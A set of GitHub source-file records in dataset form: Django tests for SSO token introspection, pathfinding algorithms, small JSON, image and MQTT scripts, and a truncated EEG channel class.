'west':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_U, value=rDist)\n elif direction == 'north' or direction == 'south':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_V, value=rDist)\n\n\n def calcInvCellDistances(self):\n ### sets recCellDist as a parameterFaceField with inverse cell distances between internal cells and face-cell distance at boundary\n\n f_u = self.calcInvCellDistance('west')\n f_v = self.calcInvCellDistance('south')\n return (f_u, f_v)\n\n\n def calcFaceArea(self, direction):\n constArea = self.uniformSpacing**2\n# constArea = 1\n if direction == 'east' or direction == 'west':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_U, value=constArea)\n elif direction == 'north' or direction == 'south':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_V, value=constArea)\n\n def calcFaceAreas(self):\n # f_u = Fields.newDataField( shape=fGov.typeShapeDict['faces_u'], value=1.0 )\n # f_v = Fields.newDataField( shape=fGov.typeShapeDict['faces_v'], value=1.0 )\n f_u = self.calcFaceArea('east')\n f_v = self.calcFaceArea('south')\n\n return (f_u, f_v)\n\n def getShape(self):\n return MeshConfig.SHAPE_SCALAR_CV\n\n def getStats(self):\n print( self.nbCells )","repo_name":"fjaschmoneit/multiphase-test-bench","sub_path":"src/MultiphaseTestBench/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4262732202","text":"from datetime import datetime, timedelta\n\nimport pytest\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.timezone import utc\nfrom freezegun import freeze_time\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom datahub.company.test.factories import AdviserFactory\nfrom datahub.oauth.auth import SSOIntrospectionAuthentication\nfrom datahub.user_event_log.constants import UserEventType\nfrom datahub.user_event_log.models import UserEvent\n\nFROZEN_DATETIME = datetime(2020, 1, 1, 0, 
tzinfo=utc)\nSTAFF_SSO_INTROSPECT_URL = f'{settings.STAFF_SSO_BASE_URL}o/introspect/'\nEXAMPLE_SSO_EMAIL_USER_ID = 'user_id@example.test'\n\n\nclass IntrospectionAuthView(APIView):\n \"\"\"View using SSOIntrospectionAuthentication.\"\"\"\n\n authentication_classes = (SSOIntrospectionAuthentication,)\n permission_classes = ()\n\n def get(self, request):\n \"\"\"Simple test view with fixed response.\"\"\"\n return Response({'content': 'introspection-test-view'})\n\n\nview = IntrospectionAuthView.as_view()\n\n\ndef _make_introspection_data(**overrides):\n return {\n 'active': True,\n 'username': 'email@example.test',\n 'email_user_id': EXAMPLE_SSO_EMAIL_USER_ID,\n 'exp': (FROZEN_DATETIME + timedelta(hours=10)).timestamp(),\n **overrides,\n }\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('local_memory_cache')\n@freeze_time(FROZEN_DATETIME)\nclass TestSSOIntrospectionAuthentication:\n \"\"\"Tests for SSOIntrospectionAuthentication.\"\"\"\n\n @pytest.mark.parametrize(\n 'request_kwargs,expected_error',\n (\n pytest.param(\n {},\n 'Authentication credentials were not provided.',\n id='no-header',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'wrong-scheme-no-space'},\n 'Incorrect authentication scheme.',\n id='wrong-scheme-no-space',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'wrong-scheme 8jol80DF'},\n 'Incorrect authentication scheme.',\n id='wrong-scheme',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'bearer'},\n 'Authentication credentials were not provided.',\n id='no-token',\n ),\n ),\n )\n def test_rejects_malformed_headers(\n self,\n api_request_factory,\n request_kwargs,\n expected_error,\n ):\n \"\"\"Test that errors are returned for various header values.\"\"\"\n request = api_request_factory.get('/test-path', **request_kwargs)\n response = view(request)\n\n assert response['WWW-Authenticate'] == 'Bearer realm=\"api\"'\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': expected_error}\n assert not request.user\n\n @pytest.mark.parametrize(\n 'response_kwargs',\n (\n pytest.param(\n {\n 'status_code': status.HTTP_401_UNAUTHORIZED,\n 'json': {'active': False},\n },\n id='non-existent-token',\n ),\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': {},\n },\n id='inactive-response',\n ),\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': {'active': False},\n },\n id='expired-token',\n ),\n # Should not happen in reality\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': _make_introspection_data(exp=FROZEN_DATETIME.timestamp() - 1),\n },\n id='expired-token',\n ),\n ),\n )\n def test_authentication_fails_on_introspection_failure(\n self,\n response_kwargs,\n api_request_factory,\n requests_mock,\n ):\n \"\"\"Test that authentication fails and an error is returned when introspection fails.\"\"\"\n AdviserFactory(sso_email_user_id='user_id@example.test')\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, **response_kwargs)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n\n def test_authenticates_if_noncached_token_provided(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication is successful if a valid, non-cached token is provided.\"\"\"\n adviser = AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n 
requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=_make_introspection_data())\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert request.user == adviser\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'content': 'introspection-test-view'}\n\n user_events = list(UserEvent.objects.all())\n assert len(user_events) == 1\n user_event = user_events[0]\n assert user_event.adviser == adviser\n assert user_event.type == UserEventType.OAUTH_TOKEN_INTROSPECTION\n assert user_event.api_url_path == '/test-path'\n\n def test_authenticates_if_token_is_cached(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication is successful if a valid, cached token is provided.\"\"\"\n adviser = AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n cached_data = {\n 'email': 'email@example.test',\n 'sso_email_user_id': EXAMPLE_SSO_EMAIL_USER_ID,\n }\n cache.set('access_token:token', cached_data)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert not requests_mock.called\n assert request.user == adviser\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'content': 'introspection-test-view'}\n\n assert not UserEvent.objects.exists()\n\n def test_caches_token_with_timeout_on_introspection(self, api_request_factory, requests_mock):\n \"\"\"Test that after introspection, token data is cached with a timeout.\"\"\"\n AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n introspection_data = _make_introspection_data()\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=introspection_data)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert response.status_code == status.HTTP_200_OK\n\n # Check that the returned token data is cached\n assert cache.get('access_token:token') == {\n 'email': introspection_data['username'],\n 'sso_email_user_id': introspection_data['email_user_id'],\n }\n\n caching_period = settings.STAFF_SSO_USER_TOKEN_CACHING_PERIOD\n post_expiry_time = FROZEN_DATETIME + timedelta(seconds=caching_period)\n\n # Check that the cached token data expires after the caching period\n with freeze_time(post_expiry_time):\n assert not cache.get('access_token:token')\n\n def test_authentication_fails_if_user_is_inactive(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication fails when there is a matching but inactive user.\"\"\"\n AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID, is_active=False)\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=_make_introspection_data())\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n\n def test_authentication_fails_if_no_matching_user(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication fails when there is no matching adviser in Data Hub.\"\"\"\n # Create an unrelated user that should not be returned\n AdviserFactory(email='unrelated@email.test', sso_email_user_id='unrelated@id.test')\n requests_mock.post(\n STAFF_SSO_INTROSPECT_URL,\n json=_make_introspection_data(username='email@email.test'),\n )\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = 
view(request)\n\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/oauth/test/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":9068,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"32959891524","text":"import json\n\nwith open('people.json') as ifd:\n dicts = list(json.load(ifd))\n\nkeys = set()\nfor d in dicts:\n keys.update(d.keys())\n\nfor d in dicts:\n for k in keys:\n d.setdefault(k, None)\n\nwith open('updated_people.json', 'w', encoding='utf-8') as ofd:\n json.dump(dicts, ofd, indent=3)\n","repo_name":"albert2126/StepikPythonProfs","sub_path":"Part04/restore_keys.py","file_name":"restore_keys.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40454481869","text":"from typing import List, Callable\nfrom heapq import heapify, heappush, heappop\nfrom pathfinder.algorithms.Nodes import Node, PrioritizedItem\n\nimport random\n\n\nclass Graph:\n # TODO remove for loop from self.nodes initilization and mix it with the second for loop\n\n def __init__(self, grid: List[List]) -> None:\n \"\"\"\n precondition: grid will contain a uniform amount of nodes per row\n \"\"\"\n self.nodes = [[Node() for column in range(len(grid[1]))]\n for row in range(len(grid))]\n\n self.v = 0\n self.edges = {}\n\n self.visited = []\n self.path = []\n self.distances = {}\n for row in range(len(grid)):\n for col in range(len(grid[row])):\n self.v += 1 # number of vertices\n node = self.nodes[row][col]\n node.value = grid[row][col]\n node.x = col\n node.y = row\n self.edges[node] = []\n weight = 1\n if not node.is_wall():\n\n if col < len(grid[row])-1:\n neighbor = self.nodes[row][col+1]\n neighbor.value = grid[row][col+1]\n neighbor.x = col+1\n neighbor.y = row\n self.add_edge(node, neighbor, weight)\n\n if col > 0:\n neighbor = self.nodes[row][col-1]\n neighbor.value = grid[row][col-1]\n neighbor.x = col-1\n neighbor.y = row\n self.add_edge(node, neighbor, weight)\n\n if row < len(grid)-1:\n neighbor = self.nodes[row+1][col]\n neighbor.value = grid[row+1][col]\n neighbor.x = col\n neighbor.y = row+1\n self.add_edge(node, neighbor, weight)\n\n if row > 0:\n neighbor = self.nodes[row-1][col]\n neighbor.value = grid[row-1][col]\n neighbor.x = col\n neighbor.y = row-1\n self.add_edge(node, neighbor, weight)\n\n def add_edge(self, u: Node, v: Node, weight: int) -> None:\n\n if not v.is_wall():\n if u not in self.edges:\n self.edges[u] = [(v, weight)]\n else:\n self.edges[u].append((v, weight))\n\n if v not in self.edges:\n self.edges[v] = [(u, weight)]\n else:\n self.edges[v].append((u, weight))\n\n # if not v.is_wall():\n # if u not in self.edges:\n # self.edges[u] = {v: weight}\n # else:\n # self.edges[u][v] = weight\n # if v not in self.edges:\n # self.edges[v] = {u: weight}\n # else:\n # self.edges[v][u] = weight\n\n @ staticmethod\n def heuristic(curr: Node, goal: Node, D: int = 1) -> int:\n \"\"\"\n Returns an admissible heuristic in manhattan distance \n \"\"\"\n return D*(abs(curr.x-goal.x) + abs(curr.y - goal.y))\n\n @ staticmethod\n def dijkstra_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns F cost when heuristic is 0\n \"\"\"\n f = g\n return f\n\n @ staticmethod\n def greedy_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns f cost when g cost 
is 0\n \"\"\"\n f = h\n return f\n\n @ staticmethod\n def astar_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns f cost with an admissible heuristic combined with g cost\n \"\"\"\n f = g+h\n return f\n\n def pathfinder(self, start_vertex: Node, end_vertex: Node, f: Callable[[int, int], int]) -> List:\n distances = {self.nodes[i][j]: float('inf') for i in range(len(self.nodes))\n for j in range(len(self.nodes[i]))}\n distances[start_vertex] = 0 # f cost\n pq = []\n # open_list = []\n heappush(pq, PrioritizedItem(0, start_vertex))\n # open_list.append(start_vertex)\n while pq:\n curr_vertex = heappop(pq).item\n # open_list.remove(curr_vertex)\n self.visited.append(curr_vertex)\n if curr_vertex == end_vertex:\n break\n\n else:\n\n self.visited.append(curr_vertex)\n\n for neighbor in self.edges[curr_vertex]:\n weight, neighbor = neighbor[1], neighbor[0]\n # weight = self.edges[curr_vertex][neighbor[1]]\n # neighbor = neighbor[0]\n\n g_cost = distances[curr_vertex] + weight\n old_g_cost = distances[neighbor]\n\n heuristic = self.heuristic(curr_vertex, end_vertex, weight)\n tie_breaker = 1/self.v\n heuristic *= (1.0 - tie_breaker)\n f_cost = f(g_cost, heuristic)\n\n # if old_g_cost < g_cost and neighbor in self.visited:\n # index = self.visited.index(neighbor)\n # self.visited[index] = curr_vertex\n # distances[neighbor] = g_cost\n # neighbor.set_prev(curr_vertex)\n if neighbor in self.visited:\n continue\n for node in pq:\n node = node.item\n if neighbor.x == node.x and neighbor.y == node.y:\n if old_g_cost != distances[node]:\n # print(node, old_g_cost, distances[node])\n continue\n else:\n if g_cost < old_g_cost:\n heappush(pq, PrioritizedItem(f_cost, neighbor))\n distances[neighbor] = g_cost\n neighbor.set_prev(curr_vertex)\n\n return self.visited\n\n def dijkstra(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.dijkstra_f_cost)\n return self.visited\n \"\"\"\n # TODO handle case where there is no start and end ndoe, or case where they overlap each other\n\n distances = {self.nodes[i][j]: float('inf') for i in range(len(self.nodes))\n for j in range(len(self.nodes[i]))}\n distances[start_vertex] = 0\n # print(distances)\n pq = []\n heappush(pq, PrioritizedItem(0, start_vertex))\n while pq:\n\n current_vertex = heappop(pq).item\n self.visited.append(current_vertex)\n for neighbor in self.edges[current_vertex]:\n weight = self.edges[current_vertex][neighbor]\n if neighbor not in self.visited:\n\n old_cost = distances[neighbor]\n new_cost = distances[current_vertex] + weight\n if new_cost < old_cost:\n heappush(pq, PrioritizedItem(new_cost, neighbor))\n distances[neighbor] = new_cost\n neighbor.set_prev(current_vertex)\n self.distances = distances\n return self.visited\n \"\"\"\n\n def a_star(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.astar_f_cost)\n return self.visited\n\n def greedy_bfs(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.greedy_f_cost)\n return self.visited\n\n def shortest(self, node: Node) -> None:\n if node.previous:\n self.path.append(node.previous)\n self.shortest(node.previous)\n\n return\n\n def get_paths(self, target: Node) -> List:\n self.path.append(target)\n self.shortest(target)\n return self.path\n\n def dispatch(self, algo: str, nodes: List[Node]) -> List:\n dispatcher = {\n 'astar': lambda nodes: self.a_star(nodes[0], nodes[1]),\n 'dijkstra': lambda nodes: self.dijkstra(nodes[0], nodes[1]),\n 
'greedyBfs': lambda nodes: self.greedy_bfs(nodes[0], nodes[1]),\n }\n return dispatcher[algo](nodes)\n\n\nif __name__ == \"__main__\":\n\n ...\n","repo_name":"galaddirie/pathfinder_app","sub_path":"pathfinder/algorithms/PathFinder.py","file_name":"PathFinder.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32266412214","text":"#import Image from PIL\nfrom PIL import Image\n#Load Images into objects\nbase_img=Image.open(\"base.jpeg\")\nimg_filter=Image.open(\"download.jpg\")\n#set 0/p image size\nsize=(780,760)\n#resize all images to o/p size\nbase_img=base_img.resize(size)\nimg_filter=img_filter.resize(size)\nr,g,b=base_img.split()\nR,G,B=img_filter.split()\nim=Image.merge(\"RGB\",(R,g,B))\nim=Image.merge(\"RGB\",(r,Gg,b))\n#im.save('1_merged.jpg')\n","repo_name":"poojak-shetty/insta-filter","sub_path":"instafilters.py","file_name":"instafilters.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73060372425","text":"import paho.mqtt.client as mqtt\n\nMQTT_HOST=\"172.20.0.2\"\nMQTT_PORT=1883\nMQTT_TOPIC=\"hw3\"\n\nCLOUD_MQTT_HOST=\"169.61.16.130\"\nCLOUD_MQTT_PORT=1883\nCLOUD_MQTT_TOPIC=\"facedetection\"\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to jetson\")\n\ndef on_connect_cloud(client, userdata, flags, rc):\n print(\"Connected to cloud\")\n\ndef on_message(client, userdata, msg):\n print(\"on message received\")\n cloudmqttclient.publish(CLOUD_MQTT_TOPIC,payload=msg.payload,qos=2,retain=False)\n\ncloudmqttclient = mqtt.Client()\ncloudmqttclient.connect(CLOUD_MQTT_HOST,CLOUD_MQTT_PORT,60)\ncloudmqttclient.on_connect = on_connect_cloud \n\nmqttclient = mqtt.Client()\nmqttclient.on_connect = on_connect \nmqttclient.on_message = on_message \n\nmqttclient.connect(MQTT_HOST,MQTT_PORT,60)\nmqttclient.subscribe(MQTT_TOPIC, qos=2)\n\nmqttclient.loop_forever() # Start networking daemon\n","repo_name":"Divyaraaga/w251-DeepLearning","sub_path":"hw3/jetson_forwarder/forwarder.py","file_name":"forwarder.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10480354958","text":"import math\nfrom datetime import datetime\nfrom datetime import timedelta\nimport logging\n\nfrom DataStructure.BIDS.BIDS import BIDSfieldLibrary\n\nLogger = logging.getLogger(__name__)\n\n\ndef ReplaceInField(In_string, Void=\"\", ToReplace=None):\n \"\"\"Find and replace strings in ToReplace tuple \n in input string. 
If input string is empty, returns \n Void string\"\"\"\n\n if not isinstance(In_string, str) or not isinstance(Void, str):\n raise TypeError(\"ReplaceInField: In_string and Void must be a string\")\n\n if ToReplace is not None:\n if not isinstance(ToReplace, tuple)\\\n or len(ToReplace) != 2\\\n or not isinstance(ToReplace[0], str)\\\n or not isinstance(ToReplace[1], str):\n raise TypeError(\"ReplaceInField: \"\n \"ToReplace must be either None or (str,str)\")\n\n if In_string == \"\" :\n return Void\n\n if ToReplace is not None:\n return In_string.replace(ToReplace[0], ToReplace[1])\n return In_string\n\n\nclass GenChannel(BIDSfieldLibrary):\n \"\"\"An intendent virtual class serving as parent to other,\n format specific channel classes.\"\"\"\n\n __base_slots__ = [\n \"_scale\", \"_offset\",\n \"_unit\", \"_magnitude\",\n \"_physMin\", \"_physMax\",\n \"_digMin\", \"_digMax\",\n \"_seqStartTime\",\n \"_seqSize\",\n \"_frequency\",\n \"_name\",\n \"_type\",\n \"_description\",\n \"_reference\",\n \"_id\",\n\n \"_startTime\",\n \"_frMultiplier\",\n \"_baseChannel\",\n \"BIDSvalues\"]\n\n BIDSfields = BIDSfieldLibrary()\n\n __slots__ = __base_slots__\n\n def __copy__(self, source):\n if not isinstance(source, GenChannel):\n raise TypeError(\": Source object must be a daughter of \"\n + self.__class__.__name__)\n for f in self.__base_slots__:\n setattr(self, f, getattr(source, f))\n self._baseChannel = source\n\n \"Min and max values for an signed short integer\"\n _MAXSHORT = 32767\n _MINSHORT = -32768\n\n \"\"\"Dictionary of standard SI prefixes, as defined in BIDS\"\"\"\n _SIprefixes = {24:'Y', 21:'Z', 18:'E', 15:'P', 12:'T', 9:'G',\n 6:'M', 3:'k', 2:'h', 1:'da', 0:'', -1:'d', \n -2:'c', -3:'m', -6:'µ', -9:'n', -12:'p', \n -15:'f', -18:'a', -21:'z', -24:'y'}\n\n \"\"\"Inverted dictionary of standard SI prefixes, as defined in BIDS\"\"\"\n _SIorders = {'Y':24, 'Z':21, 'E':18, 'P':15, 'T':12,'G':9, \n 'M': 6,'k': 3,'h': 2,'da': 1, 0:'', 'd':-1, \n 'c':-2, 'm':-3, 'µ':-6, 'n':-9, 'p':-12, \n 'f':-15, 'a':-18, 'z':21, 'y':-24}\n\n _BIDStypes = [\"AUDIO\", \"EEG\", \"HEOG\", \"VEOG\", \"EOG\", \"ECG\", \"EKG\",\n \"EMG\", \"EYEGAZE\", \"GSR\", \"PUPIL\", \"REF\", \"RESP\", \n \"SYSCLOCK\", \"TEMP\", \"TRIG\", \"MISC\"]\n\n def __init__(self):\n super(GenChannel, self).__init__()\n self._scale = 1.\n self._offset = 0.\n self._unit = \"\"\n self._magnitude = 0\n self._physMin = self._MINSHORT\n self._physMax = self._MAXSHORT\n self._digMin = self._MINSHORT\n self._digMax = self._MAXSHORT\n\n self._frequency = 1\n self._name = \"\"\n self._type = \"\"\n self._description = \"\"\n self._reference = \"\"\n\n self._seqStartTime = []\n self._seqSize = []\n\n self._startTime = datetime.min\n self._frMultiplier = 1\n\n self._baseChannel = self\n self._id = -1\n self.BIDSvalues = dict()\n\n def GetId(self): return self._id\n\n def SetId(self, Id): self._id = Id\n\n def GetScale(self): return self._scale\n\n def GetOffset(self): return self._offset\n\n def GetPhysMax(self): return self._physMax\n\n def GetPhysMin(self): return self._physMin\n\n def GetDigMax(self): return self._digMax\n\n def GetDigMin(self): return self._digMin\n\n def SetScale(self, scale, offset=0):\n \"\"\"Defining new scale and offset. 
Physical minimum and maximum\n are recalculated accordingly.\"\"\"\n if not (isinstance(scale, int) or isinstance(scale, float)):\n raise TypeError(\"Scale must be integer or float value\")\n if not (isinstance(offset, int) or isinstance(offset, float)):\n raise TypeError(\"Offset must be integer or float value\")\n\n self._scale = scale\n self._offset = offset\n self._physMin = self._fromRaw(self._digMin)\n self._physMax = self._fromRaw(self._digMax)\n\n def SetPhysicalRange(self, minimum, maximum):\n \"\"\"Defining new physical extrema.\n The scale and offset are recalculated.\"\"\"\n\n if not (isinstance(minimum, int) or isinstance(minimum, float)):\n raise TypeError(\"Physical mimimum must be \"\n \"integer or float value\")\n\n if not (isinstance(maximum, int) or isinstance(maximum, float)):\n raise TypeError(\"Physical maximum must be \"\n \"integer or float value\")\n\n if minimum >= maximum:\n raise ValueError(\"Physical minimum must be \"\n \"lower than maximum\")\n self._physMin = minimum\n self._physMax = maximum\n self._calculateScale()\n\n def SetDigitalRange(self, minimum, maximum):\n \"\"\"Defining new digital extrema.\n The scale and offset are recalculated.\"\"\"\n if not (isinstance(minimum, int)):\n raise TypeError(\"Digital mimimum must be integer value\")\n if not (isinstance(maximum, int)):\n raise TypeError(\"Digital maximum must be integer value\")\n if minimum >= maximum:\n raise ValueError(\"Digital minimum must be lower than maximum\")\n if minimum < self._MINSHORT:\n raise ValueError(\"Digital minimum must be \"\n \"greater than minimum short value\")\n if maximum > self._MAXSHORT:\n raise ValueError(\"Digital maximum must be \"\n \"greater than maximum short value\")\n\n self._digMin = minimum\n self._digMax = maximum\n self._calculateScale()\n\n def _calculateScale(self):\n \"\"\"Recalculates scale and offset \n according to physical and digital extrema.\"\"\"\n self._scale = (self._physMax - self._physMin)\\\n / (self._digMax - self._digMin)\n self._offset = self._physMin - self._scale * self._digMin\n\n def FromRaw(self, value):\n \"\"\"Transform raw short integer value to the measured one.\n Input must be integer and in Digital range.\"\"\"\n if not (isinstance(value, int)):\n raise TypeError(self.__class__ + \": Value must be an integer\")\n if value > self._digMax or value < self._digMin:\n raise Exception(self.__class__\n + \": value \" + str(value) + \" out of the range [\"\n + str(self._digMin) + \", \"\n + str(self._digMax) + \"]\")\n return self._fromRaw(value)\n\n def _fromRaw(self, value):\n \"\"\"Transform raw short integer value to the measured one.\n No checks in value performed.\"\"\"\n return value * self._scale + self._offset\n\n def ToRaw(self, value):\n \"\"\"Transform measured value to raw short integer.\n Input must be float and in Physical range.\"\"\"\n if not (isinstance(value, int) or isinstance(value, float)):\n raise TypeError(self.__class__\n + \": Value must be an integer or float\")\n if value > self._physMax or value < self._physMin:\n raise Exception(self.__class__\n + \": value \" + str(value) + \" out of the range [\"\n + str(self._physMin) + \", \"\n + str(self._physMax) + \"]\")\n return self._toRaw(value)\n\n def _toRaw(self, value):\n \"\"\"Transform measured value to raw short integer one.\n No checks in value performed.\"\"\"\n return int((value - self._offset) / self._scale + 0.5) \n\n def SetName(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__\n + \": Name must be a string\")\n 
self._name = name\n\n def GetName(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._name, Void, ToReplace)\n\n def SetType(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \": Type must be a string\")\n self._type = name\n\n def GetType(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._type, Void, ToReplace)\n\n def BidsifyType(self):\n \"\"\"Replace the type of channel by a BIDS supported type.\n Matching is performed by searching string from _BIDStypes\n in original type. If not found, a MISC type is attributed.\n \"\"\"\n if self._type == \"EKG\":\n self._type = \"ECG\"\n if self._type in self._BIDStypes:\n # Type already BIDS complient\n return\n\n bids_type = \"MISC\"\n for t in self._BIDStypes:\n if t in self._type:\n bids_type = t\n break\n if bids_type == \"EKG\":\n bids_type = \"ECG\"\n Logger.debug(\"{}:Changing type from {} to {}\".format(\n self._name, self._type, t))\n self._type = t\n\n def SetDescription(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \" : Description must be a string\")\n self._description = name\n\n def GetDescription(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._description, Void, ToReplace)\n\n def SetReference(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \": Reference must be a string\")\n self._reference = name\n\n def GetReference(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._reference, Void, ToReplace)\n\n def SetUnit(self, unit):\n if not (isinstance(unit, str)):\n raise TypeError(self.__class__ + \": Unit must be a string\")\n self._unit = unit\n\n def GetUnit(self, wMagnitude=True, Void=\"\"):\n if wMagnitude:\n if self._unit == \"\":\n if self._magnitude == 0:\n return Void\n else:\n return \"x10^\" + str(self._magnitude)\n\n if self._magnitude in self._SIprefixes:\n return self._SIprefixes[self._magnitude] + self._unit\n else:\n magn = min(self._SIprefixes.keys(),\n key=lambda k: abs(k - self._magnitude))\n return \"x10^\" + str(self._magnitude - magn)\\\n + \" \" + self._SIprefixes[magn] + self._unit\n else:\n if self._unit == \"\": return Void\n else: return self._unit \n\n def SetMagnitude(self, magn):\n \"\"\"Setting the magnitude to the measured value.\n This affects scale, offset and physical range.\"\"\"\n if not (isinstance(magn, int)):\n raise TypeError(self.__class__ + \": magnitude must be an integer\")\n self._scale /= 10**(magn + self._magnitude)\n self._offset /= 10**(magn + self._magnitude)\n self._physMin /= 10**(magn + self._magnitude)\n self._physMax /= 10**(magn + self._magnitude)\n self._magnitude = magn\n\n def OptimizeMagnitude(self):\n magn = math.log10(self._scale) + self._magnitude\n if magn < 0 : \n magn = int(math.floor(magn) / 3 - 0.5 + 1) * 3\n else :\n magn = int(math.ceil(magn) / 3 + 0.5 - 1) * 3\n self.SetMagnitude(magn)\n\n def GetFrequency(self):\n return self._frequency\n\n def SetFrequency(self, freq):\n if not isinstance(freq, int):\n raise TypeError(\"Frequency must be an integer representing Hz\")\n self._frequency = freq\n\n def GetMagnitude(self):\n return self._magnitude \n\n \"\"\"Functions related to the sequences, i.e.\n unenturupted periods of data-taking.\"\"\"\n\n def GetNsequences(self):\n \"\"\"Returns number of interupted sequences\"\"\"\n return len(self._seqStartTime)\n\n def GetSequenceStart(self, seq=0):\n \"\"\"Returns the start time of the ith sequence\"\"\"\n return self._seqStartTime[seq]\n\n def GetSequenceEnd(self, 
seq=0):\n return self._seqStartTime[seq]\\\n + timedelta(seconds=self.GetSequenceDuration(seq))\n\n def GetSequenceSize(self, seq=0):\n \"\"\"Returns the size (number of measurements) in given sequence\"\"\"\n return self._seqSize[seq]\n\n def GetSequenceDuration(self, seq=0):\n \"\"\"Returns the time span (in seconds) of given sequence\"\"\"\n return self._seqSize[seq] / self._frequency\n\n def SetStartTime(self, start):\n if not isinstance(start, datetime):\n raise TypeError(\"StartTime must be a datetime object\")\n self._startTime = start\n\n def GetStartTime(self):\n return self._startTime\n\n def SetFrequencyMultiplyer(self, frMult):\n if not isinstance(frMult,int):\n raise TypeError(\"Frequency multiplyer must be a positif integer\")\n if frMult <= 0:\n raise ValueError(\"Frequency multiplyer must be positif\")\n self._frMultiplier = frMult\n\n def GetFrequencyMultiplyer(self):\n return self._frMultiplier\n\n \"\"\"\n Functions related to the index of a partiular data points.\n Each point can be indexed by global index, common to all channels,\n given the common time origin, and common frequency, or by local index\n defined its position in its sequence.\n \"\"\"\n def GetGlobalIndex(self, point, sequence,\n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts local index from a sequence to a global one\n Do not check if given point is actually exists in sequence\n\n It uses round to get the index if StartTime is not synchronized\n with sequence time\n\n Parameters\n ----------\n point : int\n local index of data point in sequence\n sequence : int\n index of a sequence\n StartTime : datetime, optional\n the time from which the global index should be calculated\n if not defined, channel's start time is used\n freqMultiplier : int, optional\n frequency multiplier used to convert from local channel\n frequency to a common one. If not set, channel defined\n multiplier is used\n\n Returns\n -------\n int\n the global index\n\n Raises\n ------\n IndexError\n if sequence is out of range\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime object\")\n if not (isinstance(freqMultiplier,int) or freqMultiplier > 0):\n raise TypeError(\"freqMultiplier must be a positive 